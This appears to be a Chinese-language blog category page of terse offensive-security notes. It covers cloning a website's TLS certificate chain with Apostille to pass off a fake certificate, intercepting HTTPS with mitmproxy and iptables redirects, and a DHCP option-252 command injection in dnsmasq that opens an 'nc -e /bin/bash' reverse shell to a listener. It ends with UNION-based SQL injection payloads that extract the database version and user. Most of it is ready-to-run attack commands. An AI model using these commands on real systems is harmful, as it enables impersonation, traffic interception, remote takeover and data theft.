分类 Cybersecurity 下的文章

在Freebuf看到一篇文章
技术讨论 | Apostille:让假证书以假乱真的证书伪造工具

使用Java开发的工具 需要用到JDK来运行
用Maven构建jar package mvn package

[INFO] Copying bctls-jdk15on-1.58.jar to /root/apostille/target/bctls-jdk15on-1.58.jar
[INFO] Copying hamcrest-core-1.3.jar to /root/apostille/target/hamcrest-core-1.3.jar
[INFO] Copying bcprov-jdk15on-1.58.jar to /root/apostille/target/bcprov-jdk15on-1.58.jar
[INFO] Copying bcpkix-jdk15on-1.58.jar to /root/apostille/target/bcpkix-jdk15on-1.58.jar
[INFO] Copying junit-4.12.jar to /root/apostille/target/junit-4.12.jar
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  03:11 min
[INFO] Finished at: 2019-05-07T14:52:12+08:00
[INFO] ------------------------------------------------------------------------

成功构建jar

README用法 java -jar target/apostille-1.0-SNAPSHOT.jar example.com:443 dstkeystore.jks kspassword keypassword > example.com.key+chain

克隆证书链试试

# java -jar target/apostille-1.0-SNAPSHOT.jar feng.cmd.gd:443 fake-cert-feng.cmd.gd.jks kspassword keypassword > fake-feng.cmd.gd.key+chain
Provided keystore now has the following aliases:
Alias: dst root ca x3, added Tue May 07 14:56:35 HKT 2019
Alias: cmd.gd, added Tue May 07 14:56:36 HKT 2019

fake-feng.cmd.gd.key+chain:

Key for cmd.gd
-----BEGIN EC PRIVATE KEY-----
MD...2g==
-----END EC PRIVATE KEY-----
Certificate 1: Subject = CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
Certificate 1: Issuer  = CN=DST Root CA X3, O=Digital Signature Trust Co.
-----BEGIN CERTIFICATE-----
MI...zQ==
-----END CERTIFICATE-----
Certificate 0: Subject = CN=cmd.gd
Certificate 0: Issuer  = CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US
-----BEGIN CERTIFICATE-----
MI...Ai
-----END CERTIFICATE-----

note: output的certificate调转了, Nginx部署的方式是certificate->rootCA->subCA

来看看certificate的属性, 左边是正常由Let's Encrypt颁发的certificate, 右边是clone fake的certificate
fake4.png
fake1.png

对比下两个证书的序列号和fingerprint
fake2.png
fake3.png

安装到nginx看看
克隆ECC貌似有问题 key和certificate校验不过, RSA正常

Google Chrome 版本 76.0.3799.0(正式版本)canary (64 位)
QQ截图20190520094820.png

较低版的Chrome可能可绕过 lol

Github: https://github.com/sensepost/apostille
Archive: apostille-master(Commits on Jul 23, 2018).zip

source code: https://github.com/mitmproxy/mitmproxy
official webtsite: https://www.mitmproxy.org/

支持pip安装 docker部署
官方也为Windows打包了exe

安装后开启web界面 web界面默认8081 proxy默认8080
mitmweb --set web_iface=0.0.0.0
使用mitmproxy也行, 没web方便 调参数较麻烦
web调参数即点即有, 界面如下
QQ截图20190404141740.png

iptables重定向流量

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
ip6tables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080

劫持时遇到的坑
服务器与mitmproxy使用SSLv3, 手动指定Cipher来避免使用SSLv3
用openssl命令来看服务端使用的cipher

# openssl s_client -debug -connect feng.cmd.gd:443
CONNECTED(00000003)
write to 0x55bcecd42820 [0x55bcecd54610] (303 bytes => 303 (0x12F))
......
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-ECDSA-AES256-GCM-SHA384
......
---
^C

把cipher填到mitmproxy的ciphers_server就oJ8k 不能在前面加TLS- lol

dnsmasq --user=root --interface=eth0 --bind-interfaces  --except-interface=lo --dhcp-range=10.10.0.10,10.10.0.20,1h --conf-file=/dev/null --dhcp-option=6,10.10.0.1 --dhcp-option=3,10.10.0.1 --dhcp-option="252,yarrak'&nc -e /bin/bash 10.10.0.3 1337 #" --log-queries --log-facility=/var/log/dnsmasq-server.log
nc -l -p 1337 -v

猜数据库列数
order by 2 -- ,拼接后的SQL语句 SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2 -- ';
存在列数正常输出,出错时出现Unknown column '3' in 'order clause'
使用联合查询 union
1' union select 1,2 -- ,拼接后的SQL语句 SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,2 -- ';
SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),user() -- ';